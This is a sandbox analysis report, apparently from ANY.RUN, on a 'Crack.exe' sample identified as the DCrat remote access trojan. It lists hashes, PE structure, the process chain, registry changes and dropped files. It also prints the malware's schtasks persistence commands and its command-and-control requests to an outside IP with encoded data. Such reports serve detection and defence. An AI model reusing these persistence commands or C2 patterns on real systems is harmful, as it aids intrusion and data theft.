File name: | Crack.exe |
Full analysis: | https://app.any.run/tasks/03ee7134-0e06-4214-a391-edace4111234 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | April 01, 2023, 12:36:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | F8B29AC8C789DFB6648B12FC5D7864A1 |
SHA1: | BE8788B70CE54C592BFD47F29F962A655F953081 |
SHA256: | D9F58E101D377205A0EB569403B16572D30E78C54ACA01A2473F1F0FCDE9FC6A |
SSDEEP: | 49152:UbA30K1OMfWcVv6Y6feCfkOqg0yWEwwFywwtwWRifupv5Vp7foapzOkGfWDriGvU:UbcDucAs2l1FywTgWCD7QapzOkLDr5RC |
.exe | | | Win32 Executable (generic) (52.9) |
---|---|---|
.exe | | | Generic Win/DOS Executable (23.5) |
.exe | | | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 255488 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, 32-bit |
TimeStamp: | 2020:12:01 18:00:55+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x0000DFD0 | 0x0000E000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 6.63675 |
.reloc | 0x00071000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.25329 | 1875 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 5.10026 | 2216 | UNKNOWN | English - United States | RT_ICON |
3 | 5.25868 | 3752 | UNKNOWN | English - United States | RT_ICON |
4 | 5.02609 | 1128 | UNKNOWN | English - United States | RT_ICON |
5 | 5.18109 | 4264 | UNKNOWN | English - United States | RT_ICON |
6 | 5.04307 | 9640 | UNKNOWN | English - United States | RT_ICON |
7 | 3.1586 | 482 | UNKNOWN | English - United States | RT_STRING |
8 | 3.11685 | 460 | UNKNOWN | English - United States | RT_STRING |
9 | 3.11236 | 440 | UNKNOWN | English - United States | RT_STRING |
10 | 2.99727 | 326 | UNKNOWN | English - United States | RT_STRING |
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2964 | "C:\Users\admin\AppData\Local\Temp\Crack.exe" | C:\Users\admin\AppData\Local\Temp\Crack.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
3220 | "C:\Windows\System32\WScript.exe" "C:\winSaves\pI1ncDRKXOO.vbe" | C:\Windows\System32\wscript.exe | — | Crack.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2912 | C:\Windows\system32\cmd.exe /c ""C:\winSaves\o0f7O9jVQUVK1.bat" " | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3548 | "C:\winSaves\PortMonitor.exe" | C:\winSaves\PortMonitor.exe | — | cmd.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
2184 | "C:\Windows\System32\cmd.exe" /c "C:\winSaves\PortMonitor.exe" | C:\Windows\System32\cmd.exe | PortMonitor.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1204 | C:\winSaves\PortMonitor.exe | C:\winSaves\PortMonitor.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
3072 | schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3648 | schtasks.exe /create /tn "PortMonitor" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3724 | schtasks.exe /create /tn "PortMonitorP" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Microsoft Help\PortMonitor.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3912 | schtasks.exe /create /tn "SearchProtocolHostS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\SearchProtocolHost.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2964) Crack.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2964) Crack.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2964) Crack.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2964) Crack.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3220) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3220) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3220) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3220) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3548) PortMonitor.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
Operation: | write | Name: | EnableLUA |
Value: 1 | |||
(PID) Process: | (3548) PortMonitor.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2964 | Crack.exe | C:\winSaves\pI1ncDRKXOO.vbe | vbe | |
MD5:13928DA812816AB56D330EA306D0C6F4 | SHA256:A05B31459D6740CB413FDF6E721048D1344ADDD9FFC4EC4505844050CD8809D5 | |||
1204 | PortMonitor.exe | C:\ProgramData\Microsoft Help\PortMonitor.exe | executable | |
MD5:88D334930C206C730F9B21F68D2580FC | SHA256:872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 | |||
1204 | PortMonitor.exe | C:\MSOCache\All Users\{90140000-001B-0410-0000-0000000FF1CE}-C\e8aa3d0a77e909 | text | |
MD5:EA87CD86F42582EFC8E619C92DD6842D | SHA256:3D55EF671807ABFDBAF79C1DD74204A7214AAA3DA0A010BD250679936B3912A5 | |||
1204 | PortMonitor.exe | C:\Users\Public\Desktop\617403385cfa57 | text | |
MD5:12FC47E356C270290D42094981E5F315 | SHA256:2AD7C184BB38EC50A1F83D6E3374828E229BC91C9EECF8B03DF2891B64AC0A2F | |||
2964 | Crack.exe | C:\winSaves\o0f7O9jVQUVK1.bat | text | |
MD5:0F4E1FD6D78321F445CE4D226FB7788E | SHA256:726E83139D35E880FC97B473DE9E48E9C4715F0E11518678D5AED648F888382C | |||
1204 | PortMonitor.exe | C:\ProgramData\Microsoft Help\3493c6ec4133a5 | text | |
MD5:B64A4CD96F85948FF2975F8C9C623A43 | SHA256:548AEA2D1DCAF77E7BA01D51FBA61597B5C450D4E26D7268AC320590DCD86551 | |||
2964 | Crack.exe | C:\winSaves\PortMonitor.exe | executable | |
MD5:88D334930C206C730F9B21F68D2580FC | SHA256:872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 | |||
1204 | PortMonitor.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\spoolsv.exe | executable | |
MD5:88D334930C206C730F9B21F68D2580FC | SHA256:872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 | |||
1204 | PortMonitor.exe | C:\Users\Public\Desktop\SearchFilterHost.exe | executable | |
MD5:88D334930C206C730F9B21F68D2580FC | SHA256:872AE19D9054791541CCDB21C4C1818FC403A8607ED1EB2BC6AB1AFCA9807652 | |||
1204 | PortMonitor.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\f3b6ecef712a24 | text | |
MD5:E10E6EEE63939FAF9981892F9E6908F7 | SHA256:D8DAD6A84074461D3D08DADD4A620A77C10A3B6AFFB54E30E37EBE3861879409 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2948 | SearchProtocolHost.exe | GET | — | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnBTRVdWTU1kNjpXT2UERJpXSE1Ue4MVT2FleXJiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | — | — | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r&bcc31a2d967b731818da98c237e4d99f=8718086f666781861db7ec0ee0e18bc3&cec6b04b0668728de3a6b2a93639588c=QZmNmNzETY3QWZ1IDOyYmYxkjNjVDO1IGOyAzNxczMjFWNjFmYjJmM&B7WkvJxoCjhkr2VmyI9UhH21wKHer=vMSvVYlDKw8&Q5gRFbxRd0fQX3FexkBS7=yUR6h6Au7NV216VeFqrZ04r | NL | text | 2.05 Kb | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiImJGMkljMzgzMyEzY2gDNzYWMyIzN3QzM4gDZ4EzMkhzMmZWO5YjM1IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIhF2NjJWN2kjZjRGOjRTM1E2YyQGOiVWYldzNmRmY5YTNmFTOwQTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIyMjMkFWZ5QGOzkTZlRjYzMWZ4cjZ2MWMmFTO5Y2YmNjMyQjZ0UGMwIiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=QX9JiI6IyNwY2YxQjNzEmYmdDNwUTY4ADOwADMyMDZwcjZ2QTY4ICLigTMlRjZ4MWYlhTMxcDNhZGN5YzNwgTZ0IWN0ATNmdTN2MTNhFWMhRjI6IyNxUGMhlTOykjZjNDMzAjZiFGNzUDZxUWNiVGZ4YmMiJCLiUmZlRDOlNjNxMDOilTNwAjMwkzMlZmM2YTOmFWNmdDZhlDZ0AzM3ImI6IiZ5YWMjN2Y5ATMzcjZlZmZiRjZ4QzYwMjMhdzYhBzY3Iyes0nI5EjbJpXUq90dRp2T3FkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJx2aU1UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVN1TykUaPlWUt5ENZdUTppFVNlmRXlFeVdVT1UlaZpmVX5UeVd0T3FEVNJTV65kaWdUToJFVZVTStlVbapWSzl0UKFTSqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dplkexcUSz0kaJZTSD9ENVpWWtpEROpXSykFbGpnTp5kaNtmUt5EaOdkW4lFVatGZUp1aa1WWqpFVad3YqpFMJdkWpdXaJ9SSp9UaBR0TrZFRatmQU10dJRlT0sGVapmRHp1MZdUTshGVahmRUllejpXTycmaaJTUU9EeRJjT3VkaJNXS5BVavpWSwkkMOxmSykFbGpXWx0kaOd3YEpVNFpXWphmaatmUq5UbORVT6VVbNFTR65kMFR0TthmeORTSDxUaBpWS2kUaZBTW6l1MF1WWsZ1RadXUXpVbGdVTqhGROJTWt5ENF1WWopkaNtGbq1UeJdlTzU0RPhXVtlVaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJVXOHpVd5cEV2V1RjZnSYRmRKl2TpVVbiZHcYpFdsdEZpdXaJdXQE10dBRUTp9maJNnRHRme5c0YpdXaJRXOHplb1cVYMJ0QaxmUYFWdWZUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplEMJpWT4RzQNR3dD5kMrRkT1VEVOl2bqlka5ckYpdXaJNEZrlkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMlWU65UdrpmT1lEVPhHNT5ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiIlBjZ5EzYxQGNjhjZiJWOkFWZlNTZzYDN2Y2MyATZ1UTY5UjN1UmMxIiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=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